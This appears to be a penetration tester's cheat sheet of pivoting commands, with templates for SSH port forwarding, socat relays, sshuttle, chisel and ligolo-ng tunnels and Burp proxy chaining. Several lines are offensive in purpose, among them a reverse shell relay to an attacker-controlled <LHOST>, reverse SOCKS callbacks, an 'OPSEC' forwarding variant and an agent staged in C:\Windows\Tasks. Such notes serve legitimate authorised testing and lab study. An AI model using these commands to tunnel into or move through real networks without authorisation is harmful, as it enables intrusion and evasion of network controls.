% pivot

# local port forward (-fN means run in background)
ssh -L <LOCAL_PORT>:<TARGET_IP>:<TARGET_PORT> <USER>@<PIVOT_IP> -fN

# forward proxy
ssh -D <LOCAL_PORT> <USER>@<TARGET_IP> -fN

# remote port forward (must start ssh service)
ssh -R <LOCAL_PORT>:<TARGET_IP>:<TARGET_PORT> <USER>@<LHOST> -i <KEYFILE> -fN

# reverse proxy (not in older ssh clients)
ssh -R 1337 <USER>@<LHOST> -i <KEYFILE> -fN

# reverse shell relay
sudo nc -lvnp <LPORT>
./socat tcp-l:<ANY_PIVOT_LPORT>,reuseaddr,fork tcp:<LHOST>:<LPORT> &

# port forward - EASY
./socat tcp-l:<ANY_PIVOT_LPORT>,fork,reuseaddr tcp:<TARGET_IP>:<TARGET_PORT> &

# port forward - OPSEC (LPORT1=SEND; LPORT2=RECV)
socat tcp-l:<LPORT1> tcp-l:<LPORT2>,fork,reuseaddr &
./socat tcp:<LHOST>:<LPORT1> tcp:<TARGET_IP>:<TARGET_PORT>,fork &
curl localhost:<LPORT2>

# connect to server in a /24 network
sshuttle -r <USER>@<PIVOT_IP> <SUBNET>/24

# connect to server; don't know subnet
sshuttle -r <USER>@<PIVOT_IP> -N

# connect to server with key in a /24 network
sshuttle -r <USER>@<PIVOT_IP> --ssh-cmd "ssh -i <KEYFILE>" SUBNET/24

# FIX: client_loop: send disconnect: Broken pipe client: fatal: server died with error code 255
sshuttle -r <USER>@<PIVOT_IP> <SUBNET>/24 -x <PIVOT_IP>

# reverse SOCKS proxy (kali is server)
./chisel server -p <LPORT> --reverse &
./chisel client <LHOST>:<LPORT> R:socks &

# forward SOCKS proxy (kali is client)
./chisel server -p <LISTEN_PORT> --socks5
./chisel client <TARGET_IP>:<LISTEN_PORT> <KALI_PORT>:socks

# remote port forward (kali is server)
./chisel server -p <LPORT> --reverse &
./chisel client <LHOST>:<LPORT> R:<ANY_LOCAL_PORT>:<TARGET_IP>:<TARGET_PORT> &
curl localhost:<ANY_LOCAL_PORT>

# local port forward (kali is client)
./chisel server -p <PIVOT_PORT>
./chisel client <PIVOT_IP>:<PIVOT_PORT> <ANY_LOCAL_PORT>:<TARGET_IP>:<TARGET_PORT>

# foxyproxy socks5 > burpsuite > proxychains
foxyproxy: localhost:8080 (burpsuite proxy)
burpsuite: "Settings" (upper right-hand corner) > "Network" (left sidebar) > "SOCKS Proxy" (scroll to the bottom) > Check "Override options for this project only" > 127.0.0.1 for the host and 1080 for the port

# ligolo
sudo ip tuntap add user <USER> mode tun ligolo
sudo ip link set ligolo up
ligolo-proxy -selfcert
C:\Windows\Tasks>agent.exe -connect <LHOST>:11601 -ignore-cert
sudo ip route add <INTERNAL_SUBNET>/24 dev ligolo
ligolo-ng » session
[Agent : ...] » start

# curl proxy file upload example
curl -x http://127.0.0.1:8080 -X POST http://10.6.244.237:5000/api/test --data-binary @$PWD/test

$ LHOST: ip -f inet addr show tun0 | sed -En -e 's/.*inet ([0-9.]+).*/\1/p'
